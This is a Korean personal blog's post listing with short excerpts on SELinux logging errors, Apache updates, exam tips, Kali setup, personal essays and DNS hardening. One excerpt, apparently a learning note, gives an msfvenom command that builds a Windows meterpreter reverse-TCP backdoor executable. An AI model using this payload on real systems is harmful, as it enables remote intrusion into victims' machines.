전체 글 썸네일형 리스트형 PHP로 시스템 로그 쓰기 시 권한 오류(Permission Denied) 해결 CentOS7의 apache-php 환경에서 로그를 남기려고 하는데, 계속 아래와 같은 오류를 발생하였다. PHP Warning: error_log(/flag_log/flag_test.log): failed to open stream: Permission denied 로그 파일 생성 및 쓰기가 되지 않는 것은 당연... 당연히 디렉토리 및 파일 권한에 관련된 문제로 생각해서 파일 권한 및 소유자 변경을 아무리 어떤 방식으로 해도 해결이 되지 않았다. 결국 찾은 문제는 SELinux /etc/selinux/config 파일은 아래와 같다.# This file controls the state of SELinux on the system. # SELINUX= can take one of these three.. 더보기 yum 으로 아파치 웹서버 최신 버전 업데이트 하기 리눅스 CentOS 7 기준, yum으로 아파치 웹서버를 설치하면 최신버전이 설치되지 않는다. (2.4.6 버전 설치) 최신버전은 드러나지 않은 버그들이 존재할 수 있기에 그런것이지만 yum으로 설치한 아파치 버전도 보안 취약점이 존재하였기에 최신 버전으로 업데이트 하기로 하였다. 참고로 현재(2018년 9월) 아파치 웹서버의 최신 버전은 2.4.34(relased 2018-07-16) 이다. # yum info httpd --> 현재 설치된 httpd 버전 확인 기본 yum 저장소에는 최신 버전의 아파치 웹서버를 찾을 수 없기 때문에 CodeIT 에서 만든 커스텀 저장소(repo)를 사용해야 한다. 이를 사용하기 위해 EPEL을 활성화 해야 한다. # yum install -y epel-release .. 더보기 한국사능력검정시험 긴급 벼락치기 팁(3급) 아래 내용은 한국사 시험 준비 방법으로 정말 추천하지 않습니다. 중급의 경우는 비교적 수월하게 합격이 가능하지만 시험에 임박하도록 준비를 하지 못해 곤란한 분들께작은 도움이라도 되지 않을까 싶어 나름의 팁을 공유합니다. 사실 대단한 방법도 아닙니다. 다시 한번 강조하지만 절대로 추천하는 방법은 아닙니다. 바람직하지도 않구요. '-';; 특별한 결심 없이 신청해놓은 40회 한국사능력검정시험 중급.이런저런 핑계에 공부는 시작도 못하고 시험을 볼까말까 고민하다가결국 하루 전날이 되어서야 그래도 시험이라도 봐보자라는 마음에 벼락치기를 시작하였다. 아무리 중급이라고는 하나 하룻밤에 공부하기에는 무리가 있는 도전이긴 했다. 평소에 역사에 대해 관심을 갖고 익숙한 상태였으면 별 문제가 없었겠지만, 거의 20여년 만에.. 더보기 [메타익스플로잇] 간단한 악성코드 생성 (msfvenom) * msfvenom : 메타익스플로잇 프레임워크의 악성코드 생성 명령어 * msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.142.138 lport=4444 -f exe -o /root/Desktop/backdoor.exe - -p 옵션 : payload, 보안에서 payload는 악성코드의 일부분. (공격코드) - windows/meterpreter/reverse_tcp : 이미 만들어놓은 payload . 윈도우(운영체제) - 메타익스플로잇 인터프리터(페이로드 종류) - 역으로 tcp 접속(커넥션 방식) - lhost 및 lport :서버 아이피 및 포트로 -p 옵션의 옵션 - -f 옵션 : 파일포맷 - -o 옵션 : 아웃풋 경로 root@kal.. 더보기 칼리/우분투 리눅스 기본 환경 설정 (VMWare 환경) apt install open-vm-tools-desktop // 자동으로 VMWare 화면 크기에 따라 해상도가 맞춰짐, 클립보드 호환 apt install fonts-nanum im-config nabi // 한글폰트, 한글키보드 설정, 한글입력기 등 설치 im-config// 한글키보드 설정 -> 한글설정 후 확인 apt-get update// 설치된 프로그램을 업데이트 or 방금 설치한 프로그램들을 시스템에서 인지하도록 등록 ※ 한영전환은 shift+space * 제어판 -> devices -> keyboard -> 하단 + 클릭 -> shortcut 설정 가능 1) terminal -> command : gnome-terminal -> ctrl+alt+c (예시) 2) web -> firefox.. 더보기 아빠의 마음 ◈ Namenoct◈ URLnone◈ Date04-05-30◈ Title내 아이가 생기면...◈ Memo여느때처럼 낮잠을 자다가 평소에는 상상도 안했던 꿈을 꿨다. 꿈 속에서 내 아기가 태어났다. '';; 내가 꿈 속에서 얼마나 기뻐했는지 온 건물 안을 정신없이 뛰어다니고, 여기저기 전화해서 알리려고 했는데 흥분해서 전화번호 조차 제대로 누르지 못했다. 아기 엄마가 누군지 안나왔다는게 너무 아쉽지만... 쩝... 그렇게 꿈속에서 기뻐하며 흥분했던 적은 거의 없었던 것 같은데... 나로서는 무지 뜻밖의 꿈이다. 별로 내 자식에 대해서는 생각해본적도 없고 (아직 생각할 나이가 아니지만) 2세가 생긴다면 비뚤어진 인간이 안될 정도로만 간섭하고, 자기가 알아서 살도록 해야지... 하고 생각하고 있었다. 부모님의.. 더보기 마린블루스, 스노우캣... 2002 월드컵 즈음이였나...한창 병역특례로 근무를 하고있을 그 시절누군가의 소개로 접했던 그림 일기가 있었으니그게 바로 마린블루스와 스노우캣이였다. 공감 가는 사연들과 소소한 일상을 보면서 내 얘기들을 보는 것처럼 빠져들곤 했었다.하루 하루 새로운 일기가 나왔는지 기대하며 사이트에 들어가곤 했었는데... 오늘 어쩌다 고양이 사진을 보고 스노우캣이 떠올라사이트에 다시 들어가보니 예전의 그 정감있던 일기는 없었지만아직도 그 귀차니즘 스노우캣은 잘 살아있는것 같았다. 그리고 집에서 키우는 고양이에 대해서 처음으로 관심을 갖게했던 스노우캣의 나옹이 작년에 세상을 떠났다는 소식도 들었다. 왠지 모르게 허한 느낌과 그 시절 추억 한부분이 떨어져 나간 기분이 든다.나옹이가 하늘나라에서 아프지 않고 행복하길... .. 더보기 Top6 DNS Security Risks 조치권고 [출처] [보안] Top6 DNS Security Risks 조치권고 (DNS전문가) |작성자 DNS카페운영진 1. 서버리스트 노출 문제점: DNS서버의 기본 보안설정 미비로 많은 기업들 DNS를 통해 전체 서버리스트가 노출 되어 있다. 해결법 : DNS서버에 서버리스트 전송제한 기능 설정 필요 (Zone-transfer 제한기능 설정필요) 메뉴얼 : http://cafe.naver.com/dnspro/292 2. OPEN DNS 취약점에 노출된체 운영중 문제점 : 현재 DNS네임서버운영 기관들의 네임서버를 PC DNS로 설정하면 인터넷이 가능하며, 운영버전에 따라 캐쉬 포이즈닝 공격 취약점이 존재한다. 해결법 : 네임서버 전용과 Cache DNS전용 DNS서버를 구분하여 운영. - DNS취약점 이용 해.. 더보기 이전 1 2 3 4 5 ··· 44 다음
